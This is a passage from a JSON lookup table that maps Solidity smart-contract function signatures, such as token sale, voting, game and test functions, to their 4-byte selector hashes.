"0x0c424284", "BoulePreSale(address,uint256,uint256,uint256,address)": "0xd7be708c", "purchase(bytes32,uint256)": "0xe123182b", "getOrderLength(address)": "0xde6b8a2e", "getStockLength()": "0x6b4660f8", "purchaseFor(address,bytes32,uint256)": "0xe8f64680", "removeInventory(bytes32)": "0xd255494a", "addInventory(bytes32,string,string,string,string,uint256,uint256)": "0xe01ef1f8", "setPaymentContractAddress(address)": "0x3f117b85", "CentralityGiftShop()": "0xa544805c", "removeAtIndex(bytes32[],uint256)": "0x477a0eb3", "remove(bytes32[],bytes32)": "0xca4b4fd6", "indexOf(bytes32[],bytes32)": "0xe9c003d2", "PYPToken()": "0x40f56cfb", "LADCToken()": "0x62b52b49", "Trump()": "0x70be564b", "setLiquid(bool,uint256,bytes)": "0xaf488ca3", "setMetadata(string,uint256,bytes)": "0x3c42f95a", "setIssuer(address,address)": "0x9a38330d", "calculateTotalDirectDebitAmount(uint256,uint256,uint256)": "0x3c8e66fb", "directDebitOf(address,address)": "0x03dcead2", "delegateTransferAndCall(uint256,uint256,address,uint256,bytes,uint8,bytes32,bytes32)": "0xdf17c4b1", "ClipperCoin(uint256,uint8,string,string)": "0x533d4270", "Bivacoin()": "0x0bf36806", "setMaxEthPerAddress(uint256)": "0x47665ae8", "setBaseEthCap(uint256)": "0xedd94fb9", "getCurrentFgcCap()": "0xfcb80d16", "releaseVestedTokens(address)": "0xce699a41", "SimpleLSTDistribution(address,address,uint256,uint256,uint256,address)": "0x805c3d89", "LendroidSupportToken()": "0xa7987b58", "vest(bool)": "0x2b8e4df1", "contributeWithoutVesting()": "0xfb088558", "contributeAndVest()": "0x9a0907c2", "contribute(bool)": "0x40656963", "changeIndividualCapInWei(uint256)": "0x9691a8bf", "SimpleTGE(address,uint256,uint256,uint256,uint256)": "0x400bb308", "reclaimEther(address)": "0x9a6a30a4", "blacklistAddresses(address[])": "0x77a54eb8", "bulkReserveTokensForAddresses(address[],uint256[],bool[])": "0x2da64861", "disableAllocationModificationsForEver()": "0xcb0177a0", "releaseTokens(bool)": "0x646eba48", "Cloud(uint256,uint256,string,string,address)": "0x3801e6b6", "setTrade(bool)": "0x142e9ab8", "deliverTokensAdmin(address,uint256)": "0xbb476637", "TrypCrowdsale()": "0x4c58994c", "SealToken()": "0xf05854ba", "setPools(uint16,uint16,uint16)": "0x8b5b1c9a", "enterLarge()": "0x130766c5", "enterMedium()": "0x0254ef0f", "enterSmall()": "0x78367e46", "isCurrentTierCapReached()": "0xd7522582", "doBuy()": "0x3adda69a", "leftForSale()": "0xd1e6a64f", "whitelistAddresses(address[],uint256,bool)": "0x763730bd", "isWhitelisted(address,uint256)": "0x830639ac", "investorAmountTokensToBuy(address)": "0xa7dfc420", "initializeTier(uint256,address)": "0x674ef6c3", "initializeToken(address)": "0x234a6ed8", "Contribution(address,address,address,address)": "0xc867cccb", "contributionOpen()": "0x8f350624", "CND(address)": "0x9d94743a", "BTC8000on420()": "0xa9f992b1", "PlusPayLite()": "0x2727d018", "SUNCOIN()": "0x0ea317a9", "backVISTAcoinOwner()": "0x75df9fdb", "VISTACrowdSaleP1(address,address)": "0x0a6ee71a", "Data()": "0x4b6e7d78", "Identify()": "0xd48b2e92", "approveAndCallAsContract(address,uint256,bytes)": "0xcb117f0c", "ETHERCREDIT()": "0x1e2aebf9", "FarChainToken()": "0x3f9d0954", "sendTokensToBountyOwner()": "0x937ebbd2", "setBountyOwner(address)": "0xc42791ae", "init(address,address,address,address,address)": "0x359ef75b", "CarTaxiIco(address,address)": "0x7653f795", "getBatchTransfer(address,address)": "0xcaec3c79", "setBatchTransfer(address,address,bool)": "0xd6aefb61", "enablePrivateFund()": "0xd02b1653", "disablePrivateFund()": "0xc2328516", "RICEBALLZ()": "0xb592500e", "IntegrativeWalletToken()": "0x00b8a73c", "isVulnerable(uint64,int8)": "0x59a9a63f", "getAuraColor(uint64)": "0x103f3a83", "randomPetAuraBoost(uint64,uint8)": "0x642f825a", "canMove(uint16,uint8,uint8)": "0x9d4ea0f3", "fightMonster(uint16,uint8,uint8)": "0x55a9a87c", "Strike(uint16,uint32,uint16,uint8)": "0xfcc15c8e", "fightTeams(uint16,uint8,uint8)": "0xa4a1a9bc", "getFastest(uint16,uint8,uint8)": "0xef394e1b", "getAngelInfoByTile(uint16,uint8)": "0x4a624310", "checkMonsterAttack(uint16,uint8,uint8)": "0xf5b53fc1", "move(uint16,uint8,uint8)": "0x3b22263c", "removeDeadTurns(uint16)": "0xd5349606", "setVariables(uint8,uint16,uint16,uint16)": "0x46abf8a8", "REV()": "0x2bc89ff6", "signIn(address)": "0x8fa9e55c", "_emitError(uint256)": "0x06d44278", "_addGroupToMember(address,bytes32)": "0xe2f1d298", "_removeGroupFromMember(address,bytes32)": "0xfc60bb36", "getGroups()": "0xc72b5176", "isGroupExists(bytes32)": "0x1846d125", "isUserInGroup(bytes32,address)": "0xda4f2899", "isRegisteredUser(address)": "0x1f5bdf5d", "removeUsersFromGroup(bytes32,address[])": "0x2b04b478", "addUsersToGroup(bytes32,address[])": "0x5e5ff24b", "changeGroupActiveStatus(bytes32,bool)": "0x182e8a67", "createGroup(bytes32,uint256)": "0x41ad5c72", "unregisterUser(address)": "0x21f2ca3b", "registerUser(address)": "0x2199d5cd", "isService(address,address)": "0xc9e4d8bb", "changeAllowance(address,uint256)": "0x079a193b", "allowance(address)": "0x3e5beab9", "isHolderAddress(address,address)": "0x339cfb9a", "decrementBalance(address,address,uint256)": "0x52fedefa", "addToBalance(address,address,uint256)": "0xc57d5fe9", "deliverPresaleFuelBalance(address,uint256)": "0x9c3bcd65", "deliverPresaleFuelBalances(address[],uint256[])": "0xc9693411", "finalizeCrowdfund()": "0xb6c88977", "releaseVanbexTeamTokens()": "0x0f91cce1", "transferFromCrowdfund(address,uint256)": "0x8ae8c1f3", "setCrowdfundAddress(address)": "0x9f4f4808", "FuelToken()": "0xbb221e4b", "UsdToTokenConvert(address,uint256)": "0x8dc6af54", "UsdToEtherConvert(uint256)": "0xdfc86d56", "setUsdToEtherExchangeRate(uint256)": "0xc977a7a7", "setTokenExchangeRate(address,uint256)": "0x4118cbc9", "payday(uint256)": "0x5b0b7cc8", "setPercentTokenAllocation(uint256,uint256,uint256)": "0x88d60e27", "getEmployeeInfoByName(string)": "0x0666c071", "getEmployeeInfoById(uint256)": "0xe01cdfaa", "selfdestructTokens()": "0x84270db0", "scapeHatch()": "0x16e85b2e", "addEmployee(address,string,uint256[3],uint256)": "0xd66f3afa", "incompletePercent(uint256[3])": "0x5e00b9a9", "indexTheWorkcrew()": "0xa9fc9501", "workForce()": "0x8ecfc412", "MOBILINK()": "0x0e19bac1", "getPI_edit_34()": "0x001667bb", "setPI_edit_34(string)": "0xbb3e5b0a", "getPI_edit_33()": "0x3dced193", "setPI_edit_33(string)": "0xc70ef908", "getPI_edit_32()": "0xf8e0cc1c", "setPI_edit_32(string)": "0x524e2444", "getPI_edit_31()": "0x184e8549", "setPI_edit_31(string)": "0x761e64c4", "getPI_edit_30()": "0xaac74c92", "setPI_edit_30(string)": "0xc097d629", "getPI_edit_29()": "0x32d3b711", "setPI_edit_29(string)": "0x49bff0d7", "getPI_edit_28()": "0x0c1db532", "setPI_edit_28(string)": "0x036a131d", "getPI_edit_27()": "0x6914f40f", "setPI_edit_27(string)": "0x90a971a8", "getPI_edit_26()": "0xd82ce857", "setPI_edit_26(string)": "0x7f294b10", "getPI_edit_25()": "0xabc21702", "setPI_edit_25(string)": "0x2e27c10a", "getPI_edit_24()": "0xc726c2b9", "setPI_edit_24(string)": "0x1397d7ae", "getPI_edit_23()": "0xfcde2ff6", "setPI_edit_23(string)": "0x1e6f01a7", "getPI_edit_22()": "0x014a7453", "setPI_edit_22(string)": "0xda2424ae", "getPI_edit_21()": "0x653d1ca4", "setPI_edit_21(string)": "0x498e87a9", "getPI_edit_20()": "0xb8b8fc3a", "setPI_edit_20(string)": "0xc9a75d90", "getPI_edit_19()": "0x67d6d142", "setPI_edit_19(string)": "0x0a107ac3", "getPI_edit_18()": "0xf356d6cc", "setPI_edit_18(string)": "0x106812c9", "getPI_edit_17()": "0x42e5d5c8", "setPI_edit_17(string)": "0xa0e5bb69", "getPI_edit_16()": "0xda35762a", "setPI_edit_16(string)": "0x45458643", "getPI_edit_15()": "0xc708ed9c", "setPI_edit_15(string)": "0x7aa2096a", "getPI_edit_14()": "0x5ef7b303", "setPI_edit_14(string)": "0x2d8f0981", "getPI_edit_13()": "0xb29a3cfd", "setPI_edit_13(string)": "0x09699581", "getPI_edit_12()": "0x48807db1", "setPI_edit_12(string)": "0x1a05ba8d", "getPI_edit_11()": "0xfe9d2828", "setPI_edit_11(string)": "0x7713ba04", "getPI_edit_10()": "0x03520535", "setPI_edit_10(string)": "0x1e44e6af", "getPI_edit_9()": "0x39b8e63c", "setPI_edit_9(string)": "0x28b5dde8", "getPI_edit_8()": "0x0d3fbdf8", "setPI_edit_8(string)": "0x703dbd81", "getPI_edit_7()": "0x334d86bf", "setPI_edit_7(string)": "0xfc961664", "getPI_edit_6()": "0x3640599c", "setPI_edit_6(string)": "0x29e6f3f8", "MercatusDeals()": "0x1147b142", "_removeUserCity(address,uint256)": "0x4131775e", "_addUserCity(address,uint256)": "0x1ad607da", "getUserCities(address)": "0x0bcd0694", "buyCity(uint256)": "0x6bec454a", "_assignCountry(uint256)": "0x2c4482c5", "getPrices2(uint256,uint256,uint256)": "0x92c9a11a", "getCountriesData(uint256[])": "0xeb24ffdd", "getCitiesData(uint256[])": "0xdb6997ae", "getCitiesStrings(uint256[])": "0xffe99ca7", "getCities(uint256[])": "0x26f6ec3b", "setCityPicture(uint256,string)": "0x0788f69c", "setCitySlogan(uint256,string)": "0x2acefd0f", "setCountryPicture(uint256,string)": "0xad5688d8", "setCountrySlogan(uint256,string)": "0x1fa62fb7", "setTransferMode(bool)": "0x1d24310d", "setMaintenanceMode(bool)": "0x7bf6f26e", "addCountryCities(uint256,uint256[],uint256,uint256)": "0x49ee72fc", "transferContract(address)": "0x47635dac", "addOldWithdrawals(address[],uint256[])": "0x3f9628e8", "addOldPresidents(uint256[],address[])": "0x5578d24e", "addOldNickname(address,string)": "0xb97585d3", "addOldMayors(uint256[],uint256[],address[])": "0x109e8b21", "markContractAsInited()": "0x1f402356", "CryptoElections()": "0x12ad8d20", "tokensOfOwnerByIndex(address,uint256)": "0x4707f44f", "buyTokens(address,address,address,uint256)": "0x3d125f03", "_setAllowance(address,address,uint256)": "0xc617fe6e", "_setBalance(address,uint256)": "0xab86e0a6", "setAllowanceAdmin(address,address,uint256)": "0xe238c7ed", "setBalanceAdmin(address,uint256)": "0x9580811c", "TotalCapacity()": "0x2a8ade3a", "valueOf(string)": "0x1f6b28bf", "setTotalCapacity(uint256)": "0x3767ea7e", "TokenData(uint256,uint256)": "0x48a76740", "transferToAddress(address,address,uint256)": "0x23dc210f", "mintForWorker(address,uint256)": "0xba91d87b", "mintForSale(address,uint256)": "0x58476a7a", "unlockAmount(address,uint256)": "0x22e2b31f", "_decreaseApproval(address,address,uint256)": "0xa0392897", "_approve(address,address,uint256)": "0x104e81ff", "BwinToken()": "0x45705d93", "removeUser(uint256)": "0x11dc4703", "indexOfUserInfo(uint256)": "0xf95918eb", "setUserType(address,uint256)": "0xd2973f93", "setUser(address,address,uint256,uint256)": "0xdc6b1cbd", "getTopInfo(uint256)": "0xa258dafc", "getTopInfoDetail(address)": "0x54d3f3e4", "setTop(uint256,address,uint256,bool)": "0x93588a14", "getShareHoldersInfo(uint256)": "0xfc8d4f4f", "getShareHolderCount()": "0xf7044bae", "getShareHolder(uint256)": "0xf6dfafe1", "setShareHolders(uint256,address,uint256,bool)": "0xf22c10d7", "getInterestor(address)": "0x8a6bc85a", "setInterestor(address,uint256,uint256)": "0xb440f7ff", "balanceOfme()": "0x0bdde107", "processFunds(address,uint256,uint256,bool)": "0x33d072e2", "getAmount(uint256,uint256)": "0x4ca98997", "processShares(uint256)": "0x325f9f41", "receiveFunds(address,uint256)": "0x740227d1", "withDrawable()": "0x7d6c864e", "withDrawlocked()": "0x928fca1d", "receiveLockedAmount(address,uint256)": "0xc9b4ddb2", "getLx()": "0x03d0cecd", "compute(address,uint256)": "0x49b5b541", "receiveBalanceUpdate(address)": "0xa4238d31", "rewardPay(address,uint256)": "0xc69500fd", "rewardPayedOf(address)": "0x242b0a73", "getTokensFromBuy(address)": "0x77d8ffc0", "setCommons(address)": "0xd23ad39d", "SendERC20ToAsset(address)": "0xf487e4b6", "MintToken(uint256)": "0x05297781", "bigToken()": "0xecf6f108", "allocateDelayedTokens(address,uint256)": "0xb40a9304", "allocateTokens(address,uint256,uint256)": "0x8d3f0ed5", "setDelayedTokenAllocator(address)": "0xcc6e15e5", "Bittwatt(uint256)": "0x4ac87e47", "doCancelAll()": "0x6c0a1117", "doCheckSendBounds()": "0x9536c05f", "getOpenNum(bytes32)": "0x039c9d84", "doCheckBounds(bytes32)": "0x14e6a86d", "getLableList()": "0x5b945c0e", "getAllRecords()": "0xa7f9fe72", "getLableRecords(bytes32)": "0x03dc0532", "getLastBet()": "0xbbce3fc2", "getErbutongHao(uint256)": "0x77e26762", "doSendBounds(bytes32)": "0xae817dd1", "doCancel(bytes32)": "0xac96c65e", "checkBet(uint256[],uint256[],uint256[],uint256,uint256)": "0x641b58c2", "doBet(uint256[],uint256[],uint256[],uint256)": "0xfc223410", "getPlayRate(uint256,uint256)": "0x4f219ceb", "BetContract()": "0x4b93fec0", "BTEcoin()": "0x1e185b2a", "BeeUnity(uint256,string,string)": "0x8c3fae8c", "ArinToken()": "0x42923409", "_blackListed(address)": "0x1d231b2c", "_updatePayment(uint256,address,uint256)": "0xa0d8ad85", "_payChain(uint256,address,uint256)": "0xa1169d72", "setBlockLock(bool)": "0x23a31463", "setBlacklist(bool)": "0x44c4bf10", "deleteOpenAction(string,address,string)": "0xfc122892", "addOpenAction(string,string,string,string,string)": "0x7cbe0f32", "addOpenAction(string,address,string)": "0x734b4861", "authorizeProcessor(address,address,string,string)": "0x50d00b95", "MetaRules(address,address[])": "0x73a97f42", "newENS(address)": "0xe9358b01", "verify()": "0xfc735e99", "UpgradeEvent(address,address)": "0xa6c216c2", "testGetBonus()": "0x66e8a4d7", "testGetLastTime()": "0xab8e5b01", "testValidationOfDecrease()": "0x23e4172d", "testValidationOfDoubles()": "0xbb74a5a0", "testValidation()": "0xcbe8047e", "getLastTime()": "0x955d14cd", "validate(bool)": "0x2a5b68fd", "b(bool,bool)": "0x75854fbd", "SingularityNetTokenMock(address,uint256)": "0x997519f2", "getProperties()": "0xec0cfd0b", "makePayment(uint256)": "0x5114cb52", "borrowFunds(uint256)": "0x04c08fbd", "fundVault()": "0xf7800e69", "lendVault()": "0xdc7ac1ba", "setCrowdsaleManager(address)": "0x4defd1bf", "burnTokens(address)": "0xb237f7d4", "PresaleToken(address,address)": "0xe8e09563", "MultiEventsHistory(address)": "0x3905910e", "DigitalCoin()": "0x8e62bbd9", "registerFixedToken(bytes32,uint256,address)": "0x7a9036cd", "test2()": "0x66e41cb7", "Faucet(string,address)": "0xa908f2e3", "getBlocksTillMatthew()": "0x3a76a282", "getDestroyedWhenRoundOver()": "0xa37330ea", "getNewPeriod()": "0x06637cd9", "setNewPeriod(uint256)": "0xeff631cf", "destroyWhenRoundOver()": "0xae249f2b", "setFacts()": "0xe090318c", "Matthew()": "0xf90f4a30", "ANMvesting()": "0xfd56317d", "AnemoiToken()": "0x5d40533f", "productID()": "0xf9fb452f", "location()": "0x516f279e", "sold()": "0x02c7e7af", "productSold(uint64,uint32,string)": "0xe7ac81e5", "TemperatureMeasurementB(address,uint32,uint64)": "0x0cb9ec43", "claimWei(uint256)": "0xddd7c879", "sendTokens(uint256)": "0xf5c6ca08", "getMaxClaimableWeiAmount()": "0x3ad6f8ac", "getBuyPrice()": "0x018a25e8", "getAccumulatedDistributionPercentage()": "0x6790f3fe", "getCurrentPeriodIndex()": "0xb4f5a21a", "calculateDistributionPeriods()": "0xc0670d2c", "LifMarketValidationMechanism(address,uint256,uint256,uint8,address)": "0x361ae621", "test_deposit()": "0x7c935183", "responseFromWS(address,uint256,bytes32)": "0x262933cb", "JoyGameDemo(address,address)": "0xd341e052", "SGTExchangerMock(address,address,address)": "0xb6b7e84d", "SampleERC23Token(address,uint256)": "0x536c1ddd", "test_0_testBasicTxExecution()": "0x0a86f644", "isDeployed()": "0xc52046de", "getMessage(uint256)": "0x86f79edb", "save(string,address,uint256)": "0xcde7f980", "resumeTransfer(uint256)": "0x996d310d", "CuratedTransfers(address,address[],address[])": "0x7de32b17", "Wallet()": "0x0e1b39fb", "testThrowExecuteSellOrderChecksAmount()": "0x0802350d", "testThrowExecuteSellOrderDaoChallengeRefusesZeroFunds()": "0x4e1415ab", "testExecuteSellOrderShouldNotChangeBuyerBalance()": "0x87ccb57b", "testExecuteSellOrderShouldIncreaseSellerBalance()": "0xedc31e14", "testExecuteSellOrderShouldIncreaseBuyerTokens()": "0x75780127", "testThrowExecuteSellOrderTwice()": "0xfe9fa16f", "testExecuteSellOrder()": "0x7f056637", "testThrowCancelSellOrderTwice()": "0xdb98abd8", "testCancelSellOrder()": "0x20dffb08", "testBuyTenTokens()": "0x9348caf7", "testGetAccountBalance()": "0x410c2601", "testIssueTokens()": "0x692397a4", "testSetOrganiserUsingDeployedContract()": "0x242c721e", "iudexIdToString(bytes32)": "0x6b0ead6a", "b32ToBytes(bytes32)": "0x92fe4098", "register(address,string,address)": "0x97294e58", "addRTO(uint256,address)": "0xb4a516a6", "Ownership()": "0xfbdd7852", "getLatestContract(bytes32)": "0xaea8d47c", "getLatestVersion(bytes32)": "0xdd3b014c", "getContract(bytes32,uint256)": "0x96f27b29", "isVersionLogic(address,bytes32)": "0x20cad613", "isVersionContract(address,bytes32)": "0x062af37d", "setContract(bytes32,uint256,address,address)": "0xd550668d", "updateSspAbi(string)": "0xf0705249", "updateCampaignAbi(string)": "0x8c0c9c07", "updateRtbSettlementAbi(string)": "0xa63dcbd7", "updateSspManagerContract(address,string)": "0x8f87e387", "updateCampaignManagerContract(address,string)": "0x2231454f", "updateChannelManagerContract(address,string)": "0x13b3fffc", "updateDaoContract(address,string)": "0xd34cc179", "updateTokenContract(address,string)": "0x812c86e0", "addEmployee(address,bytes32,bytes32,uint256,uint256)": "0x4524c70b", "getEmployees()": "0x4abefa36", "PillowCoin()": "0x59137533", "checkGameStatus()": "0xaba0e189", "testSetController()": "0x0fe234ed", "testGetController()": "0xc89f8f08", "testTestHarnessAuth()": "0x07b6f631", "testBalanceAuth()": "0xe6c3b4ab", "createToken()": "0x9cbf9e36", "getApprovalDB()": "0xec727000", "getBalanceDB()": "0xad447a19", "testFailGetUnsetToken()": "0xec2ec781", "testGetToken()": "0xaf6fe8e2", "testSetUp()": "0x5babb758", "testUserCanIncreaseVersionNumber()": "0x0f5381f1", "testErrorUnauthorizedAfterTransfer()": "0xb189ad2a", "testAuthorizedTransfer()": "0x36344022", "testErrorUnauthorizedNameRegister2()": "0x3e4565d2", "testErrorUnauthorizedNameRegister()": "0xeca5c793", "testSimpleNameRegister()": "0x337b5988", "testErrorUnauthorizedTransfer()": "0x88a49164", "testErrorRootAuthorityChangeUnownedPackage()": "0x8a341c83", "testUnauthorizedSetBetaPackage()": "0xb9a904f9", "testErrorUnauthorizedSetPackage()": "0x70be4ffa", "testAuthorizedSetPackage()": "0x930a80b4", "testUpdatePackageDb()": "0x408938d0", "testUpdateNameDb()": "0x74d89c47", "testLatestPkgGetter()": "0x96013c9c", "testMultiplePackages()": "0xb5784f6f", "testPkgUpdate()": "0x8bab8791", "testSetPkg()": "0xd1d3bb92", "isBeta(bytes)": "0x8efc777f", "transferName(bytes,address)": "0x992c870d", "transfearDBOwner(address)": "0x03da8902", "tryGetNameOwner(bytes)": "0x4112b7f1", "getNameOwner(bytes)": "0x44dfdce0", "setNameOwner(bytes,address)": "0x3cc8daf7", "setPackage(bytes,uint8,uint8,uint8,bytes)": "0xa587da29", "getLastVersion(bytes)": "0x027a5e3f", "getPackageHash(bytes,uint8,uint8,uint8)": "0x5168afa4", "parrot(uint256)": "0xd18dfdc9", "toLittleEndian(uint64)": "0xd063f55f", "blake2b(bytes,bytes,uint64)": "0xd299dac0", "testKeyedHash()": "0x6af2da2f", "testShortOutput()": "0xa7e25683", "testLongInput()": "0x2f597e71", "testFinalHash()": "0x0b74edc6", "flip4(bytes)": "0x26c7edaa", "flip32(bytes)": "0x745a8be2", "get4(bytes,uint256)": "0xdf5cc291", "get32(bytes,uint256)": "0xde39acea", "payFee(bytes)": "0x66aa6f26", "getNonce(bytes)": "0x51d6e547", "getBits(bytes)": "0xf74100e3", "getMerkleRoot(bytes)": "0xd9c67404", "getParentHash(bytes)": "0x726ab4ef", "getBlockVersion(bytes)": "0x19c47214", "getBlockHeight(bytes)": "0xae6215d8", "getBlockHash(uint256)": "0xee82ac5e", "parseBlock(bytes,uint256)": "0x4016535a", "BTCRelayTools(address)": "0x70c9edb7", "testBlockhashCorrectFee()": "0xad82dcac", "testFailBlockhashInsuffiecientFee()": "0xfb95adeb", "testFailHeaderInsufficientFee()": "0x9a79f4a8", "testBalance()": "0xedede601", "testBlockHeaderFetch()": "0x72c87075", "testBlockHashFetch()": "0xa54a2b8b", "RelayToolsTest()": "0xd985f122", "assign(bytes,uint256,bytes1)": "0x10142785", "rotate(uint64,uint256)": "0x0e47c76f", "shift_left(uint64,uint256)": "0xbf187478", "shift_right(uint64,uint256)": "0xfb72d24e", "getWords(uint64)": "0x217311ac", "blake2b(uint64[],uint64[],uint64)": "0x33232609", "G(uint64[16],uint256,uint256,uint256,uint256,uint64,uint64)": "0xfa2acd87", "convert(uint256,uint256)": "0x96e4ee3d", "FakeRelay(bytes)": "0xa0f61310", "getFeeRecipient(int256)": "0x87def081", "getBalanceInEth(address)": "0x7bd703e8", "MetaCoin()": "0xd6d22fa4", "say()": "0x954ab4b2", "computeResponseFirstHalf(uint16)": "0xfe13a823", "computeResponseSecondHalf(uint16)": "0x2776a859", "computeResponse(uint16)": "0x66772438", "getBlockHash(int256)": "0x2cce81aa", "getPrevHash(int256)": "0x32254992", "BlockhashFetch(address)": "0x44d03ac6", "getFeeAmount(int256)": "0x0aece23c", "getBlockchainHead()": "0x09dd0e81", "getLastBlockHeight()": "0x02394872", "getBlockHeader(int256)": "0x1f794436", "updateMaxVal()": "0x0699d07d", "getRound(uint256)": "0x8f1327c0", "payOut(uint256)": "0xda333ca6", "newRound()": "0xc5b1d9aa", "BTCLotto(address,uint256)": "0xd4871517", "getPrice()": "0x98d5fdca", "getProof(uint256,address,address)": "0x60b1e173", "adjustDifficulty(uint256)": "0x0ee07836", "challengeTimeout(uint256,bool,address)": "0xd500dd6a", "finalize(uint256,address,address)": "0x18968a03", "respond(uint256,address,bytes)": "0x9af8c4ba", "challenge(uint256,address,bool)": "0xbbdb31cb", "newChallenge(uint256,address)": "0x7c7a52bf", "SavingsAccount()": "0x5802f02d", "Yetxkd1601()": "0xfabacf0d", "isAuditorRegistered(address)": "0x71ca2117", "findAuditor(address)": "0x9fd64fea", "transferAuditorRecord(address,address)": "0xb790c32c", "unregisterAuditor(address)": "0xfc3f162b", "registerAuditor(address)": "0xdf9a4f56", "watchedURL(string,string)": "0x1b8f66a4", "require_email(bool)": "0xe2659324", "cleanupURLs()": "0x416dffb0", "removeURL(string,uint256)": "0x22faa5db", "addURL(string)": "0xd103449c", "pickURL()": "0x852dbfc6", "advert_machine()": "0x872dbdab", "test_complexNewProposalAndVoting()": "0x70e8c1b3", "test_newProposalAndVoting()": "0xb9ac38aa", "test_openRegistryRules()": "0x8c0e45f6", "test_openRegistry()": "0xc48e819c", "updateStatus(uint256,uint256)": "0xe2f31829", "verifyPass(address)": "0x85a49f2e", "addEmbassyOfCountry(address,uint256)": "0x36ef6c82", "setNation(address)": "0x62aca822", "Embassy(address,address)": "0xfc676652", "getCurrentRate()": "0xf7fb07b0", "IncreasingPriceCrowdsale(uint256,uint256)": "0x2e190d03", "switchModeSoOnlyEmergencyStopsAndEscapeHatchesCanBeUsed()": "0x0a89e0aa", "assertOnlySpecifiedCaller(address,bytes32)": "0xff55da1c", "removeValue(bytes32)": "0x51180c63", "setValue(bytes32,address)": "0xb9e290f9", "suicideFunds(address)": "0xeb03db73", "getNegativeArray()": "0x7a1bbb40", "setNegativeArray(int256,int256)": "0x59ea6d80", "setX(int256)": "0xa0fc4994", "testNegatives(int256)": "0x2b985f7c", "subtract(address,uint256)": "0x68c6b11a", "alterTotalSupply(uint256)": "0x01d78a8b", "TokenStorage(address)": "0xd1fa338d", "blocktubeUser()": "0x86c99779", "Creator()": "0x18bee97e", "mockWhiteList()": "0x0e011262", "mockBuy()": "0xfb0a0344", "MockSale(uint256,uint256,address,address)": "0x3f0cf183", "isAuthDisabled(uint256)": "0x694d3757", "getAccountWhitelist(uint256)": "0x1986fd4d", "getMilestones(uint256)": "0x42c549c0", "getConditions(uint256)": "0x1eada765", "getResponses(uint256)": "0x71ee2ce1", "getExcludes(uint256)": "0x2b88cbbf", "getIncludes(uint256)": "0xb64e2fc4", "isPending(uint256)": "0xca8836d2", "isExecuted(uint256)": "0x76a6bf52", "isIncluded(uint256)": "0x449de356", "getActivityName(uint256)": "0x1c2d6356", "getWorkflowName()": "0x42ffb76b", "sudoku()": "0x6e1d3c0d", "execute(uint32)": "0xc4c2e702", "canExecute(uint32)": "0x01272c2c", "checkWithdrawalAvailability(address,address)": "0x37189157", "setCompany(address)": "0xa8db2445", "Kiwi(address,uint256,string,string,uint8,uint8)": "0x4e44b5cc", "floor(uint256)": "0x504f5e56", "vHasVoted(uint256,address)": "0x5d95738b", "getVotingListCount()": "0x9444991d", "penalizeSolutionSubmitter(uint256,uint256)": "0x05b496bb", "paySolutionRewardGoodRep(address,uint256)": "0x965b5aa8", "paySolutionReward(uint256,uint256)": "0x7a66e5cf", "executeVoting(uint256,bytes)": "0x8a433274", "concludeVoting(uint256)": "0x345f342e", "invalidateVotingAtIndex(uint256)": "0xbbeadcad", "createVoting(string,string,uint256,bytes32,address)": "0x220f1aee", "Dao(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xc3f34a50", "withdrawable()": "0x50188301", "gatherCollateral()": "0xf5caccad", "receivedCollateral()": "0xb9ba2926", "paybackDelta()": "0x77f27251", "fundraisingDelta()": "0x25e629f2", "paybackDeadline()": "0xa36be9a1", "fundraisingDeadline()": "0x06a9d1a9", "amountInvested(address)": "0x3c3d3af6", "totalAmountInvested()": "0xf6724a55", "paybackRequired()": "0x1cd30149", "interestPermil()": "0x86f5bf88", "borrower()": "0x7df1f1b9", "amountWanted()": "0xca5f4282", "loanToken()": "0x06d37817", "isClient(address)": "0x84b7964f", "readStamped(bytes32)": "0x8378ce42", "stampDocument(bytes32,uint256)": "0x75a66774", "DigitalMaterai(uint256)": "0x476a4558", "doSelfdestruct()": "0x3fdcefe0", "callDestruct()": "0x96a7cf6a", "getTransactionHashes(uint256,uint256,bool,bool)": "0x7e6bdb95", "getConfirmations(bytes32)": "0x969f8a83", "addConfirmation(bytes32,address)": "0x02b70b41", "addTransaction(address,uint256,bytes,uint256)": "0x203fb521", "getConfirmationCount(bytes32)": "0x113642e5", "getNonce(address,uint256,bytes)": "0x39b0bc59", "Lesson_3(address,uint256)": "0x51764a94", "move(address,address,uint256)": "0xbb35783b", "pull(address,uint256)": "0xf2d5d56b", "newCampaign(string,uint256,uint256,address)": "0xcfeaaca1", "transferBenship(address)": "0x8346378b", "Benable()": "0x75d57f44", "stopEmergency()": "0x97db7edb", "startEmergency()": "0x0fb7e602", "test_oneValidAssertFalse()": "0xbdee21ff", "getAllPRS()": "0x0af1fe11", "hasVoted(address,address)": "0x4d4d2b1c", "addVotePair(address,address)": "0x79e097f0", "doCount(address)": "0x41abe705", "addToBounty()": "0xf7860bb1", "getAllTheThings()": "0xed45c9be", "getAllBounties()": "0xab643c07", "createBounty(string,address[],uint256)": "0x3ae4b008", "testDisputedInvalidSequenceWrongWriteAddress()": "0x5f2e4b31", "testDisputedInvalidSequenceWrongReadAddress()": "0x71551178", "testDisputedInvalidSequenceWrongWriteValue()": "0xe8625060", "testDisputedValidMemoryAccessSequence()": "0x2fd3dee8", "testDisputedReadValid()": "0xa80e3659", "testDisputedWriteDifferentValueInState()": "0x30630699", "testDisputedWriteValid()": "0x46911b64", "prepareDisputeValid()": "0x61708908", "calculateMemoryState(uint256)": "0x5cb3ce15", "AVMTestSuite()": "0x05bdd57b", "getMaximumWritesPerStep()": "0xb9a54062", "getMaximumReadsPerStep()": "0xd526eaeb", "getMemoryWordsLog2()": "0x5265a078", "validateStep(uint256[],uint256[])": "0xa118ca27", "newProposal(uint256,uint256)": "0x1801f00f", "newRecord(uint256)": "0x9cc04ea0", "changeVotingRules(address,uint256)": "0xac69c09c", "Nilometer()": "0x29df8972", "get_proposal_by_row(uint256)": "0xb3629f79", "get_record_by_row(uint256)": "0x475ca435", "get_record_count()": "0x556b22c1", "get_proposal_count()": "0x3800d0a3", "loop()": "0xa92100cb", "checkICO()": "0x38235781", "getTokenBalance(address)": "0x3aecd0e3", "transferEvent_(address,uint256,bool)": "0xf171a730", "TEMath(uint256,uint256,bool)": "0xaad0bb90", "checkFloatingOwnSupply(address,uint256,bool,uint256)": "0x51bcc53e", "checkFloatingSupply(address,uint256,bool,uint256)": "0xda721672", "getProviderReward(address,uint256)": "0xbdf1e7cf", "getClientReward(uint256)": "0xa9472396", "getReward(address,uint256,address)": "0x5f3893ef", "checkReward(address)": "0xc3c90e64", "partProvider()": "0x7cc08d53", "joinProvider(address)": "0x8fb50078", "disallowUsers(address,address[])": "0x5158ea5e", "allowUsers(address,address[])": 